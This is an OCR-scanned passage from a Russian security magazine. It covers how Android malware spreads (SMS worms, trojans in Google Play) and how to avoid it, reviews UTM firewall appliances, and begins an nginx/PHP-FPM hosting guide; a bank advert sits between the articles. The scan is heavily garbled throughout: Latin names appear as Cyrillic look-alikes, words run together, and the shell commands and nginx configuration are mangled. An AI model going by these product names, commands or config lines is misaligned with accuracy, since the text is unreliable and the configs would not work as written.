дешь на веб-страницу, где тебе предложат 
скачать вирус, замаскированный под 
легальное приложение. 

• СМС-рассылка. Достаточно необычный и не 
очень известный метод распространения 
АпбгоісІ-заразы. Впервыебыл использо- 
вантрояном СгизеѵѵіпсІ, который после 
установки всистему начинал рассылатьСМС 
с предложением установить программу по 
приведенной ссылке всем, кто был в списке 
контактов. Далее сценарий многократно 
повторялся. 

• Соодіе РІау. Несколько раз малварь на- 
ходили в репозитории приложений отбоодіе 
(бывший АпсІгоісІ Магкеі). Впервыеэто 
произошло в марте 2011 года, когда в тече- 
ние нескольких дней в Маркетебылообна- 
ружено21 зараженноетрояном ОгоісЮгеат 
приложение. Они были замаскированы под 
известные программы, но опубликованы 
всего тремя аккаунтами. За то время, пока 
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сотрудники боодіе собирались с мыслями, 
общее количество за раженных приложений 
достигло 56, а под угрозой оказались 200 000 
устройств. Наконец, благодаря усилиям 
Зуітіапіес, Заппзипд и Іоокоиі, Маркетбыл 
избавлен отзаразы, а Соодіе выпустила 
утилиту Апбгоіб МагкеіЗесигіІуТооІ, с по- 
мощью которойтрояна можно былоудалить 
сустройства. Спустя полгода Зутапіес 
обнаружила в Маркетееще 13 приложе- 
ний, инфицированныхтрояном Апбгоіб. 
Соипіегсіапк, что в конце концов заставило 
Соодіе принять меры и запустить Воипсег — 
робота, призванного выявлять и удалять из 
Маркета вредоносные приложения. 



что ДЕЛАТЬ? 



Итак, действие зверья понятно, пути распро- 
странения тоже. Как предотвратить заражение 
своего смартфона? Очень просто: защититься от 
99% заразы можно, просто устанавливая софт из 
проверенных источников, таких как Ооодіе РІау, 
Ата 20 п Аррзігоге и ОеУаг. Да, за него придется 



платить, но это абсолютно нормально, тем более 
что стоит он нетакуж и много, а большинство 
нужных приложений бесплатны. 

Если же все-таки установка из стандартных 
репозиториев оказывается невозможной (при- 
ложение недоступно для твоего устройства, 
Соодіе отказывается принимать банковскую 
карту, Маркета просто нет), то следует, как 
минимум, ознакомиться с привилегиями при- 
ложений перед их установкой, а также обзаве- 
стись антивирусом. Но и здесь есть подвох: как 
оказалось, две трети антивирусов для АпбгоісІ 
ни на что не годятся, поэтому нужно ставить 
антивирусы только из следующего списка, 
опубликованного компанией АѴ-ТезІ (они на- 
ходят больше 90% вирусов): 

• аѵазі! Ргее МоЫІеЗесигіІу 

• Ог.ѴѴеЬапІі-ѵігиз ЫдЫ 

• Р-5есиге МоЫІеЗесигіІу 

• ІКАРІІЗппоЬіІе.БесигіІу ЫТЕ 

• Казрегзку МоЫІеЗесигіІу (Ыіе) 

• Роокоиі5есигіІу& Апііѵігиз 

• МсАІ'ее МоЬіІеЗесигіІу 



• МУАпсІгоісІ Ргоіесііоп Апііѵігиз 

• МОМоЫІеЗесигіІу 

• 2опегАпІіѴігиз Ргее 

На вопрос, стоит ли рутить свой девайс, я бы 
ответил просто: понимаешь, что делаешь, — де- 
лай рутинг, нет — лучше оставить все как есть. 
Сам по себе рутинг не создает проблем безопас- 
ности и даже может служить некоторой защитой 
против заразы, которая на нерутованных про- 
шивках спокойно выполнит эксплойт, и ты этого 
даже не заметишь, а на рутованных будет вы- 
нуждена просить подтверждения у пользовате- 
ля. Проблемы безопасности, как всегда, создает 
сам пользователь, ставя на рутованный телефон 
варез и соглашаясь со всеми вопросами. 

Если есть необходимость установить 
стороннюю прошивку — лучше использо- 
вать СуаподепМоб и МІШ, скачанные с офи- 
циальных сайтов. Все остальное может не 
только содержать в себе бэкдоры, но и иметь 
стандартную подпись. Установив СуаподепМосІ 
и МІШ, ты получишь еще и мощный механизм 
безопасности, позволяющий отключать по- 
тенциально опасные привилегии приложений 
(МІШ так вообще будет спрашивать тебя каж- 
дый раз, когда стороннее приложение захочет 
отправить СМС или совершить звонок). 



выводы 



АпбгоісІ не так дыряв, как это может показаться 
на первый взгляд. Как и любая другая ОС, он 
имеет некоторые проблемы безопасности, од- 
нако волна зловредного ПО, которая все больше 
накрывает его, связана вовсе не с ущербностью 
модели безопасности, а с популярностью, кото- 
рую АпбгоісІ начал набирать как раз в 201 1 году. 

В этой статье мы убедились, что защитить 
себя отугрозы на самом деле довольно легко, 
а на удочку обычно попадаютте, кто слишком 
сильно любит халяву. ^ 
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Сергей «дгіпііег» Яремчук (дгіпсіеггазупаск.ги) 




ВРАГУ ВОРОТ 

ОБЗОР ПОПУЛЯРНЫХ ОТМ-РЕШЕНИЙ 



Современный интернет таит в себе множество угроз, 
и львиную долю рабочего времени админам при- 
ходится тратить на обеспечение безопасности 
сети. Появившись на ІТ-рынке, многофунк- 
циональные устройства защиты ІЯМ 
сразу привлекли внимание специали- 
стов безопасности, поскольку соче- 
тают в себе несколько модулей 
защиты с простотой развер- 
тывания и управления. 
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Врагу ворот 



что ТАКОЕ итм? 



Предприятиям необходимо надежное и простое в управлении 
средство для защиты от сетевых и вирусных атак, спама и для 
организации безопасного обмена данными. Особенно остро стоит 
вопрос в сетях малого и среднего бизнеса, где часто нет техниче- 
ской и финансовой возможности для развертывания разнородных 
систем безопасности. Да и подготовленных специалистов в таких 
организациях обычно не хватает. Именно для этих условий были 
разработаны многофункциональные многоуровневые сетевые 
устройства, получившие название ІЯМ (ІІпіЛесІ ТЬгеаІ Мападетепі, 
унифицированное устройство защиты). Выросшие из межсетевых 
экранов ІЯМ сегодня объединяют функции нескольких решений: 
файрвол с ОРІ (Веер Раскеі Іпзресііоп), систему защиты от втор- 
жений (Ю5/ІР5), антиспам, антивирус и контентную фильтрацию. 
Часто такие устройства имеют возможности организации ѴРМ, 
аутентификации пользователей, балансировки нагрузки, учета 
трафика и другие. Устройство класса «все в одном» с единой 
консолью настроек можно быстро ввести в работу, а в последую- 
щем так же легко обновлять все функции или добавлять новые. От 
специалиста требуется лишь понимание, что и как надо защищать. 
Цена ІЯМ, как правило, ниже, чем стоимость нескольких приложе- 
ний и/или устройств. 

Рынок ІЯМ достаточно большой и показывает ежегодный 
прирост на 25-30% (постепенно вытесняя «чистый» ЛгеѵѵаІІ), 
практически все крупные игроки уже представили свои решения, 
как аппаратные, так и программные. Какое из них использовать, 
это часто вопрос вкуса и доверия к разработчику, также важна 
адекватная поддержка и, конечно же, специфические условия. 
Единственный момент — следует выбрать надежный и произво- 
дительный сервер с учетом планируемой нагрузки, ведь теперь 
одна система будет выполнять несколько проверок, что потребует 
дополнительных ресурсов. При этом нужно быть внимательным: 
в характеристиках ІЯМ-решений обычно указывается пропускная 
способность межсетевого экрана, а возможности ІР5, ѴРМ и других 
компонентов зачастую на порядок ниже. Сервер ІЯМ является 
единой точкой доступа, отказ которой фактически оставит орга- 
низацию без интернета, поэтому разнообразные возможности по 
восстановлению также лишними не будут. Аппаратные реализа- 
ции часто имеют дополнительные сопроцессоры, используемые 
для обработки некоторых видов данных, вроде шифрования или 
анализа контекста, позволяющие снять нагрузку с основного СРСІ. 
Зато программную реализацию можно установить на любой ПК, 
с возможностью дальнейшего апгрейда любого компонента. В этом 
плане интересны орепзоигсе-решения (Сіпіапдіе, рІ^Зепзе, Епсііап 



и другие), позволяющие существенно сэкономить на ПО. Большин- 
ство из этих проектов предлагают также и коммерческие версии 
с продвинутыми возможностями и техподдержкой. 

РогІіОаІе 

ПЛАТФОРМА: Рог(і6а(е 
САЙТ ПРОЕКТА: ТогЫпеІ-гиззіа.ги 
ЛИЦЕНЗИЯ: платная 
РЕАЛИЗАЦИЯ: аппаратная 

Калифорнийская компания РогІіпеЦ основанная в 2000 году, сегод- 
ня является одним из крупнейших поставщиков ІЯМ-устройств, 
ориентированных на разную нагрузку — от небольшого офиса 
(РогІі6аІе-30) до центров обработки данных (РогІібаІе-5000). 
Устройства Рогіібаіе представляют собой аппаратную платформу, 
обеспечивающую защиту от сетевых угроз. Платформа оснащена 
межсетевым экраном, Ю5/ІР5, антивирусной проверкой трафика, 
антиспамом, веб-фильтром и контролем приложений. Некоторые 
модели поддерживают функции ОЕР, ѴоІР, шейпинг трафика, ѴѴАМ- 
оптимизацию, отказоустойчивость, аутентификацию пользователя 
для доступа к сетевым сервисам, РКІ и другие. Механизм активных 
профилей позволяет обнаружить нетипичный трафик (с автома- 
тизацией реакции на такое событие). Антивирус может проверять 
файлы любых размеров, в том числе и в архивах, сохраняя при этом 
высокий уровень производительности. Механизм веб-фильтрации 
позволяетустановить доступ более чем к 75 категориям веб- 
сайтов, указать квоты, в том числе в зависимости от времени 
суток. Например, доступ к развлекательным порталам можно раз- 
решить только в нерабочее время. Модуль контроля приложений 
обнаруживаеттипичный трафик (5куре, Р2Р, ІМ и тому подобное) 
вне зависимости от порта, правила ІгаІ^Лс зЬаріпд указываются для 
отдельных приложений и категорий. Зоны безопасности и вирту- 
альные домены позволяют разбить сеть на логические подсети. 
Некоторые модели имеют интерфейсы коммутатора ЕАМ второго 
уровня и ѴѴАМ-интерфейсы, поддерживается маршрутизация по 
протоколам РІР, 05РР и ВСР. Шлюз может быть настроен в одном из 
трех вариантов: прозрачный режим, статический и динамический 
МАТ, что позволяет безболезненно внедрить Рогіібаіе в любую 
сеть. Для защиты точек доступа используется специальная моди- 
фикация с ѴѴі-Рі — РогІіѴѴіРі. 

Чтобы охватить системы (ПК под управлением ѴѴіпсІоѵѵз, смарт- 
фоны АпбгоісІ), которые работают вне доверенной сети, на них 
может устанавливаться программа-агент РогІіСІіепЦ включающий 
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СКОЛЬКО методов аутентификации пользователей (пароль, РА0Ш5, 
ЗесигеЮ и другие), предлагается свой сервер ОНСР. В решении 
используется модульная архитектура, так называемые ВоЙѵѵаге 
ВІасІез (программные блейды) позволяют при необходимости рас- 
ширить функционал, обеспечивая требуемый уровень безопасности 
и стоимости. Так, можно дооснастить шлюз блейдами ѴѴеЬ Весигііу 
(обнаружение и защита веб-инфраструктуры), ѴоІР (защита ѴоІР), 
АсІѵапсесІ Меіѵѵогкіпд, Ассеіегаііоп & Сіизіегіпд (максимальная про- 
изводительность и доступность в разветвленных средах). Например, 
технологии ѴѴеЬ Арріісаііоп РігеѵѵаІІ и АсІѵапсесІ Бігеатіпд Іпзресііоп, 
применяемые в ѴѴеЬ Весигііу, позволяют в реальном времени обра- 
батывать контекст, даже если он разбит на несколько ТСР-пакетов, 
подменять заголовки, скрывая данные об используемых прило- 
жениях, перенаправлять пользователя на страницу с детальным 
описанием ошибки. 

Удаленное управление возможно средствами веб и Теіпеі/ 

55Н. Для централизованных настроек нескольких устройств 
может применяться СЬеск Роіпі ВтагіСепІег, используемая в нем 
технология Весигііу Мападетепі АгсЫіесІиге позволяет управлять 
всеми элементами СЬеск РоіпС включенными в политику безопас- 
ности. Возможности ВтагіСепІег расширяются при помощи до- 
полнительных модулей, обеспечивающих визуализацию политик, 
интеграцию с ЮАР, обновления, отчеты и прочее. Все обновления 
ІЯМ получают централизованно при помощи сервиса СЬеск Роіпі 
Сірсіаіе Бегѵісе. 

ІуШІ1 1000 

ПЛАТФОРМА: 2уѴѴАІМ000 
САЙТ ПРОЕКТА: іухеі.ги 
ЛИЦЕНЗИЯ: платная 
РЕАЛИЗАЦИЯ: аппаратная 

Большинство шлюзов безопасности, выпускаемых 2уХЕІ, из-за 
их возможностей можно смело отнести к ІЯМ, хотя по официаль- 
ному классификатору сегодня в этой линейке насчитывается пять 
моделей 2уѴѴАЮ 1156 50/100/300/1000/2000, ориентированных на 
небольшие и средние сети (до 500 пользователей). В терминологии 
2уХЕІ такие устройства называются «Центры сетевой безопасно- 
сти». Так, 2уѴѴАЮ 1000 представляет собой скоростной шлюз до- 
ступа, предназначенный для решения задач сетевой безопасности 
и управления трафиком. Включает потоковый антивирус Каспер- 
ского, Ю5/ІР5, контентную фильтрацию и защиту от спама (ВІие 
Соаі и СоттІоисЬ), контроль полосы пропускания и ѴРМ (ІРзес, 
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в себя полный комплект защиты (ЛгеѵѵаІІ, антивирус, 551 и ІРзес 
ѴРМ, ІР5, веб-фильтр, антиспам и многое другое). Для централизо- 
ванного управления несколькими устройствами РогЬпеІ и анализа 
журналов событий используются РогЬМападег и РогЬАпаІу^ег. 

Кроме веб- и терминального интерфейса, для базовой настрой- 
ки РогЬбаІе/РогЬѴѴіРі можно использовать программу РогЬЕхрІогег 
(доступна в версии для ѴѴіп и Мае 05 X), предлагающую доступ 
к 601 и СЫ (команды напоминают Сізсо). 

Одна из фишек РогЬОаІе — специализированный набор микро- 
схем РогІіА5ІС, которые обеспечивают анализ контента и обра- 
ботку сетевого трафика и позволяют в реальном времени обнару- 
живать сетевые угрозы, не влияя на производительность сети. На 
всех устройствах используется специализированная операцион- 
ка — РогЬ05. 

СЬеск Роіп( итМ-1 

ПЛАТФОРМА: СЬеск Роіпі УТМ-1 
САЙТ ПРОЕКТА: гиз.сЬескроіпІ.сот 
ЛИЦЕНЗИЯ: платная 
РЕАЛИЗАЦИЯ: аппаратная 

Компания СЬеск Роіпі предлагает три линейки устройств класса 
ІЯМ: 1ЯМ-1, ІЯМ-1 ЕЬде (удаленные офисы) и 5а1'ега01'Ьсе (неболь- 
шие компании). Решения содержат все необходимое для защиты 
сети: файрвол, ІР5, антивирусный шлюз, антиспам, средства постро- 
ения 551 ѴРМ и удаленного доступа. Межсетевой экран умеет разли- 
чать трафик, присущий большинству приложений и сервисов (более 
200 протоколов), администратор может легко заблокировать доступ 
к ІМ, Р2Р-сетям или 5куре. Обеспечивается защита веб-приложений 
и СІРЕ-фильтр, в базе данных СЬеск Роіпі содержится несколько мил- 
лионов сайтов, доступ к которым можно легко блокировать. Антиви- 
рус проверяет потоки НТТР/РТР/5МТР/Р0РЗ/ІМАР, не имеет ограни- 
чений на размер файлов и умеет работать с архивами. Модели ІЯМ-1 
с литерой ѴѴ выпускаются со встроенной точкой доступа ѴѴі-Рі. В ІР5 
используются различные методы обнаружения и анализа: сигнатуры 
уязвимостей, анализ протоколов и поведения объектов, выявление 
аномалий. Механизм анализа умеет вычленять потенциально опас- 
ные запросы и данные, поэтому тщательно проверяется всего 10% 
трафика, остальной проходит без дополнительных проверок. Это 
позволяет снизить нагрузку на систему и повысить эффективность 
работы ІЯМ. Антиспам-система использует несколько техноло- 
гий — ІР-репутацию, анализ содержимого, черный и белый списки. 
Поддерживается динамическая маршрутизация 05РР, В6Р и РІР, не- 
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Врагу ворот 




Мастер предварительной настройки Ііпіапдіе Функции защиты Ііпіапдіе реализованы путем подключения дополнительных модулей 




551 и 12ТР оѵег ІРзес ѴРМ). К слову, при покупке стоит обратить 
внимание на прошивку — международная или для России. В по- 
следней из-за ограничений таможенного союза для туннелей ІРзес 
ѴРМ и 551 ѴРМ используется ключ 0Е5 56 бит. Политики доступа 
основываются на нескольких критериях (ІР, пользователь и время). 
Средства контентной фильтрации позволяют легко ограничить 
доступ к сайтам определенной тематики и работу некоторых про- 
грамм ІМ, Р2Р, ѴоІР, таіі и прочих. Система Ю5 использует сигнату- 
ры и защищает от сетевых червей, троянов, бэкдоров, 00о5 и экс- 
плойтов. Технология обнаружения аномалий (Апотаіу Оеіесііоп 
апб Ргеѵепііоп) анализирует проходящие через шлюз пакеты на 2-м 
и 3-м уровнях 051, выявляя несоответствия, определяет и блокиру- 
ет 32 типа сетевых атак. Возможности Епб Роіпі 5есигі1у позволяют 
автоматически проверять тип ОС, наличие активного антивируса, 
ЯгеѵѵаІІ, установленные обновления, запущенные процессы, пара- 
метры реестра. Администратор может запретить выход в Сеть для 
систем, не удовлетворяющих определенным параметрам. 

Реализовано множественное резервирование доступа в интер- 
нет и балансировка нагрузки. Поддерживается аутентификация 
средствами ЮАР, Асііѵе Оігесіогу, РА0ІСІ5, что позволяет настраи- 
вать политики безопасности на основе уже принятых в организа- 
ции правил. Возможна передача ѴоІР по протоколам 5ІР и Н.323 на 
уровне ПгеѵѵаІІ и МАТ, а также в ѴРМ-туннелях. 

Базы основных компонентов обновляются и некоторые функции 
(антиспам СоттІоисЬ, увеличение количества туннелей ѴРМ) 
активируются посредством карт подключения. Настройка про- 
изводится при помощи СЫ и веб-интерфейса. Первоначальные 
установки помогает произвести мастер. 

Ііпіапдіе Бегѵег 

ОС: УпІапдІеЗегѵег 9.2.1 Сгиізег 
САЙТ ПРОЕКТА: ипіапдіе.сот 
ЛИЦЕНЗИЯ: 6Р1 
РЕАЛИЗАЦИЯ: программная 
АППАРАТНЫЕ ПЛАТФОРМЫ: х86, х64 
СИСТЕМНЫЕ ТРЕБОВАНИЯ: 

РепНит 4 или подобный АМО, 1 Гб РАМ, 80 Гб НОО, 2 ЫІС 

Любой *піх-дистрибутив можно настроить как полноценное ІЯМ- 
решение, в репозиториях пакетов доступно все необходимое для 
этого. Но есть и минусы: все компоненты придется устанавливать 
и настраивать самостоятельно, а это уже требует некоторого 



опыта, и, что немаловажно, так мы лишаемся единого интерфейса 
управления. Поэтому очень интересны готовые решения, построен- 
ные на базе орепзоигсе-систем. 

Дистрибутив Ііпіапдіе, выпускаемый одноименной компанией, 
появившись в 2008 году, сразу привлек внимание сообщества сво- 
им подходом. Его основой послужил ОеЬіап, все настройки произ- 
водятся при помощи простого и понятного интерфейса. Изначально 
дистрибутив назывался Ііпіапдіе Саіеѵѵау и был ориентирован для 
использования в небольших организациях (до 300 пользователей) 
как полноценная замена проприетарному Роге^гопі ТМС для обе- 
спечения безопасного доступа в интернет и защиты внутренней 
сети от ряда угроз. Со временем возможности дистрибутива стали 
шире, и название было изменено на Сіпіапдіе 5егѵег. Сегодня дис- 
трибутив способен обеспечить работу до 5000 пользователей. 

Изначально функции защиты Сіпіапдіе реализованы в виде 
модулей. После установки базовой системы какие-либо модули 
защиты отсутствуют, администратор самостоятельно выбирает 
то, что ему нужно. Для удобства модули разбиты по пяти паке- 
там (Ргетіит, 5іапсІагсІ, Есіисаііоп Ргетіит, Есіисаііоп 5іапсІагсІ 
и Юе), доступность которых определяет лицензия, а сами пакеты 
разделены на две группы по назначению: РіІІег и 5егѵісез. Все 
орепзоигсе-приложения собраны в бесплатном Юе, который 
содержит 13 приложений, обеспечивающих проверку трафика на 
вирусы и зруѵѵаге, контентный фильтр, блокировку баннеров и спа- 
ма, файрвол, контроль протоколов, Ю5/ІР5, ОрепѴРМ, политики 
доступа (Сарііѵе Рогіаі). В их основе лежат популярные орепзоигсе- 
приложения, такие как 5пог1, СІатАѴ, ВраппАззазіп, 5диісІ. Кроме 
этого, сервер Ііпіапдіе обеспечивает все сетевые функции: марш- 
рутизацию, МАТ, ОМ2, 0о5, имеет ОНСР- и 0М5-серверы. Модуль 
Рерогіз, входящий в пакет Юе, позволяет админу получать отчеты 



итм ОБЪЕДИНЯЮТ ФУНКЦИИ 
ФАЙРВОЛА с ОРІ, СИСТЕМУ 
ЗАЩИТЫ от ВТОРЖЕНИЙ (105/ 
1Р5Ь АНТИСПАМ, АНТИВИРУС 
И КОНТЕНТНУЮ ФИЛЬТРАЦИЮ 
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ПО всем возможным ситуациям: сетевой активности, протоколам, 
обнаруженному спаму и вирусам, активности пользователей; ре- 
зультат можно отправить по е-таіі и экспортировать в РОР, НТМІ, 
Х15, СЗѴиХМІ. 

В коммерческих пакетах доступны: балансировка нагрузки 
и Раііоѵег, контроль полосы пропускания канала и приложений, 
модуль для работы с Асііѵе Оігесіогу, резервирование настроек 
и некоторые другие функции. За плату предоставляется и под- 
держка, хотя ответы на многие вопросы можно найти на офици- 
альном форуме. Кроме этого, проект предлагает готовые серверы 
с предустановленным Упіапдіе. 

Для настройки предлагается удобный интерфейс, написанный 
на ^аѵа, все изменения и статистика работы выводятся в реальном 
времени. При работе с Ііпіапдіе от администратора не требуются 
глубокие знания *піх, достаточно понимать, что надо получить 
в результате. Установка дистрибутива довольно проста, нужно 
банально следовать подсказкам мастера, другой мастер в даль- 
нейшем помогает настроить шлюз. 

Епсііап РігеѵѵаІІ 

ОС: ЕпсПап РігеѵѵаІІ Соттипііу 2.5.1 
САЙТ ПРОЕКТА: епсііап. сот/еп/соттипііу 
ЛИЦЕНЗИЯ: 6Р1 
АППАРАТНЫЕ ПЛАТФОРМЫ: х86 

СИСТЕМНЫЕ ТРЕБОВАНИЯ: СРУ 500 МГц, 512 Мб РАМ, 2 Гб НОО 

Разработчики Епсііап РігеѵѵаІІ предлагают несколько версий 
своего продукта, реализованных в виде как аппаратной, так 
и программной платформы. В том числе есть версия и для вирту- 
альных машин. Для всех релизов указана лицензия 6Р1, однако 
для свободной загрузки доступен лишь 150-образ Соттипііу 
Есііііоп и исходный код. Операционная система построена на базе 
СепЮ5 и содержит все специфические для Еіпих приложения, 
обеспечивающие функции файрвола, Ю5/ІР5, антивирусную про- 
верку НТТР/РТР/Р0РЗ/5МТР-трафика, защиту от спама, фильтр 
контента, антиспуфинг- и антифишинг-модули, систему отчетов. 
Возможно создание ѴРМ средствами ОрепѴРМ и ІРзес с аутен- 
тификацией по ключу или сертификату. Контентный фильтр со- 
держит готовые настройки для более чем 20 категорий и подка- 
тегорий сайтов, есть Ыаскіізі и функции контекстной фильтрации. 
Используя АСЕ, можно указать параметры доступа для отдельного 
пользователя, группы, ІР, времени и браузера. Ведется стати- 
стика по соединениям, трафику, работе пользователей. При 
наступлении определенных событий на е-таіІ админа отправ- 
ляется сообщение. Предусмотрена локальная аутентификация 
пользователей, аутентификация с помощью Асііѵе Оігесіогу, ЕОАР 




Редактирование правил Зпогі в Епсііап РігеѵѵаІІ 



и РА0ІЕІ5. Интерфейс позволяет легко создать ѴЕАМ, управлять 
0о5; поддерживается 5ММР. Изначально дистрибутив комплекту- 
ется антивирусом СІатАѴ, опционально возможно задействовать 
антивирусный движок БорЬоз. 

Для настроек используется веб-интерфейс и командная строка. 
Первоначальные установки производятся при помощи мастера, 
который позволяет задать тип подключения к интернету, назна- 
чать интерфейсы (ЕАМ, ѴѴі-Рі, ОМ2). Внешнему интерфейсу можно 
присвоить несколько ІР-адресов, поддерживается МиІІіѴѴАМ. Для 
удобства настроек сетевые интерфейсы разбиты на зоны — РЕВ, 
0РАМ6Е, ВЕЕІЕ и 6РЕЕМ, правила ПгеѵѵаІІ уже содержат установки, 
определяющие обмен между ними. Настройки распределены по 
группам, названия которых говорят сами за себя, при должной 
внимательности разобраться очень просто. 



ЗАКЛЮЧЕНИЕ 



Конечно, ЕІТМ не заменяют, а дополняют средства защиты, уста- 
новленные на отдельных ПК, создавая дополнительный рубеж 
обороны на входе в ЕАМ. В зависимости от конкретных условий 
подойдут разные варианты. С защитой небольших и средних сетей 
вполне справляются ОрепЗоигсе'ные Епсііап РігеѵѵаІІ и Еіпіапдіе. 



ІШП 


итм 


КЕРІО СОМТРОЕ 


Комплексные 
системы ІЯМ 
постепенно 



Термин ЕІТМ введен Чарльзом Колоджи (СИагІез 
Коіосіду) из аналитической компании ЮС (Іпіег- 
паііопаі Оаіа Согрогаііоп) в документе «ѴѴогШѵѵісІе 
ТИгеаІ Мападетепі Зесигііу Аррііапсез 2004-2008 
Рогесазі» (опубликован в сентябре 2004 года), 
чтобы обозначить универсальные устройства 
защиты, которые способны справиться со все 
нарастающим числом сетевых атак. Изначально 
подразумевалось наличие лишь трех функций 
(ІігеѵѵаІІ, ОРІ и антивирус), теперь возможности, 
предоставляемые ЕІТМ-устройствами, гораздо 
шире. 



Продукт Кегіо СопІгоІ ( кегіо.ги/ги/сопігоі ) особо представлять нет 
необходимости. Ранее он назывался Кегіо ѴѴіпРоиІе РігеѵѵаІІ и пользовался 
популярностью среди сисадминов, в том числе благодаря простоте 
и понятности настроек, с которыми мог разобраться даже новичок. На сегодня 
это полноценное ЕІТМ-решение, обеспечивающее доступ к Сети посредством 
МАТ и прокси-сервера, антивирусную защиту (возможно использование 
двух моделей), брандмауэр уровня приложений, контент-фильтр веб-сайтов 
(53 категории), блокировщик пиринговых сетей, а также распределение 
нагрузки, резервирование ѴѴАМ, ѴРМ-сервер, детальный мониторинг и систему 
отчетов. Кегіо Сопігоі можно установить на ПК под управлением ОС ѴѴіпсІоѵѵз, 
развернуть на «голом железе» или на виртуальной машине. Управление 
осуществляется при помощи интуитивно понятного веб-интерфейса. 



вытесняют 
традиционные 
решения вроде Ііге- 
ѵѵаІІ, поэтому стоит 
присмотреться к ним 
повнимательней. 
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на правах рекламы 



1 




с 1 5 июня по 
1 5 июля 

іРаО 2 для ДЕРЖАТЕЛЕЙ 

«Мужской карты» 

КАК ПОЛУЧИТЬ ЧИТАЙ НА 

ѵѵѵѵѵѵ. тапсагсі .ги 



ЫЫ0ЫИ0ИИЫИЫ 



Н0НВИИВН00ШБ 
* ІІТГ^[0І0100І010№ 











"5І0І 



Оформитъ дебетовую или кредитную «Мужскую карту» 
можно н^ сайте уцууш аІ^аЬапк.ги или позвони в 
по телефонам: 

(495) 229-2223 в Москве 

8 800-ЗВЗ-2-333 а регионах России (звонок бесплатный) 



А Альфа-Банк (дате)іапіі 



ОАО «Альфа-Банк». Генеральная лицензия банка России на осуществление банковских операций от 05.03.2012 №1326" 
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Евгений Зобнин (ехесЬіі.ги) 



X 



Командная ИГРА 




НАСТРАИВАЕМ СВЯЗКУ 
НСІНХ + РНР-РРМ + 
ТЕ5Т-С00КІЕ + СЕОІР + 
НАХ5І ДЛЯ ХОСТИНГА 



Времена господства веб-сервера Арасбе 
на хостингах постепенно уходят в прошлое. 

Текущие версии пдіпх уже достаточно развиты, 
чтобы обеспечить необходимый уровень 
функциональности и удобства сопровождения 
сервера, обслуживающего сотни веб-сайтов. Но как 
поднять такой сервер, обеспечив оптимальное 
соотношение производительности и безопасности? 
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Командная игра 



ВВЕДЕНИЕ 



Допустим, в нашем распоряжении есть несколько серверов, которые 
мы хотим использовать для хостинга веб-сайтов, владельцам 
которых мы не можем доверять. В то же время мы хотим обеспечить 
высокий уровень сервиса из коробки, обеспечив такие функции, как 
поддержка РНР, начальная защита от 00о5 и опциональный фильтр 
по географическому признаку. Для изоляции РазіССІ-процессов 
обычно принято использовать модули АрасЬе зиехес или зирЬр, 
которые по понятным причинам нельзя применить в сочетании 
с пдіпх. Поэтому мы воспользуемся встроенными возможностями 
альтернативной РазіСбІ-реализации РНР-РРМ, которая опирается 
на механизм так называемых пулов. Благодаря им РНР-процессы 
можно разделить в обособленные группы, которые будут испол- 
няться с полномочиями указанных нами пользователей. Начальную 
защиту от 00о5 возложим на плечи модуля Іезкоокіе-пдіпх-ппосіиіе, 
который отшибает клиентов, проверяя наличие у них реализа- 
ции НТТР соокіе и поддержки редиректа. В дополнение к нему я 
предлагаю использовать модуль деоір, который может выступать 
в качестве опционального средства борьбы с ботами на основе при- 
надлежности их ІР-адресов к определенному региону земного шара. 
По умолчанию он будет отключен, однако мы подготовим каркас для 
быстрого включения геофильтра по запросу клиента. Все это будет 
работать под управлением дистрибутива ОеЬіап (ІІЬипІи), но без 
каких-либо проблем должно завестись и в АгсЬ Ыпих, и во РгееВБО. 
Приступим. 



М6ІМХ, МУ50и РНР-ЕРМ и ПЕСОЧНИЦА 



Для начала установим и настроим каркас из пдіпх, МуБОІ и РНР: 

ар1:-§е1: іпзііаіі тузді-зегуег шуз д і- сіі епі: \ 

рІір5--Ррт рІір5-ту5д1 п§іпх 

Выполним базовую настройку пдіпх: 

# ѵі /еѣс/пдіпх/пдіпх .соітР 

# Для достижения максимальной произв одительности 

# делаем число рабочих процессов равным 

# числу процессорных ядер 

шгкег ргосезБез 4: 



# Уменьшаем ч исло вызовов ^ е1:1:іпіео-РсІауО . 

# чтобы не тратить ресу рсы впустую 

1;ітег_ге501и1;іоп 100гп5; 



еггог_1о§ /ѵаг/1о§/п§іпх/егг ог Ло^: 
рісі /ѵаг/гип/п§іпх.рісІ; 



еѵеп1і5 { 

# Количество одновременных коннектов, 

# обслуживаемых одним рабочим 

ыогкег соппесІііопБ 4096: 



} 

МИИр { 

# Стандартные опции 

іпсіисіе /е1;с/п§іпх/тіте.1;уре5; 

ассе55_1о§ /ѵаг/1о^/п^іпх/ассе55 Ло§: 

# Держать кеераііѵе- соединение открытым только 

# 2 секунды 

кеераііѵе 1:ітеои1: 2; 

# Настройки сайтов в отдельных конфигах 

# (это стандартный каталог для РеЬіап -Ііке 

# дистрибутивов) 

іпсіисіе /е1:с/п^іпх/5І1:е5-епаЫесІ/*: 

} 

Теперь нам необходимо создать инфраструктуру для поддержки 
большого числа пользователей, каждый из которых может иметь 
несколько сайтов. Схема работы хостеров обычно такова: при реги- 
страции нового пользователя в системе создается каталог /Ьоте/ 
имя_пользователя/, где размещаются несколько каталогов, включая 
ѵѵѵѵѵѵ и Іодз, первый из которых содержит корневые каталоги веб- 
сайтов, а второй — логи веб-сервера, связанные с этими сайтами. 
Когда пользователь регистрирует новый домен или привязывает его 
к ІР хостера, в каталоге ѵѵѵѵѵѵ автоматически создается подката- 
лог, имя которого равно имени виртуального хоста, а сам каталог 
становится корнем для веб-сервера при запросе этого домена. Есть 
проверенные и отработанные методики создания такой схемы с по- 
мощью АрасЬе, но в случае пдіпх они будут совсем другими. 

В пдіпх описание виртуальных хостов находится прямо в голов- 
ном конфигурационном файле или в отдельных файлах, которые 
включаются в общий конфигс помощью директивы іпсіисіе (послед- 
няя строка нашего конфига). Чтобы реализовать описанную выше 
схему автоматического создания виртуальных хостов, нам понадо- 
бится следующий шаблон конфига виртуального хоста: 

# ѵі /еіс/пбіпх/БііеБ-аѵаІіЫе/іетрІаіе 
зегѵег { 

ІІБіеп 80; 

5егѵег_пате _Н05ТМАМЕ_; 

ассе55_1о§ /Ііоте/_и5ЕКМАМЕ_/1о§5/_Н05ТМАМЕ_.ассе55_1о§ таіп; 
еггог_1о§ /Ііоте/_и5ЕКІ\ІАМЕ_/1о§5/п§іпх/_Н05ТМАМЕ_.ассе55_1о§ іп-Ро; 
Г 00 І; /Ііоте/_и5ЕКМАМЕ_/ыыы/_Н05ТМАМЕ_; 

} 

Этот шаблон мы будем использовать для генерации настоящего 
конфига, который затем должен быть помещен в каталог/ек/пдіпх/ 
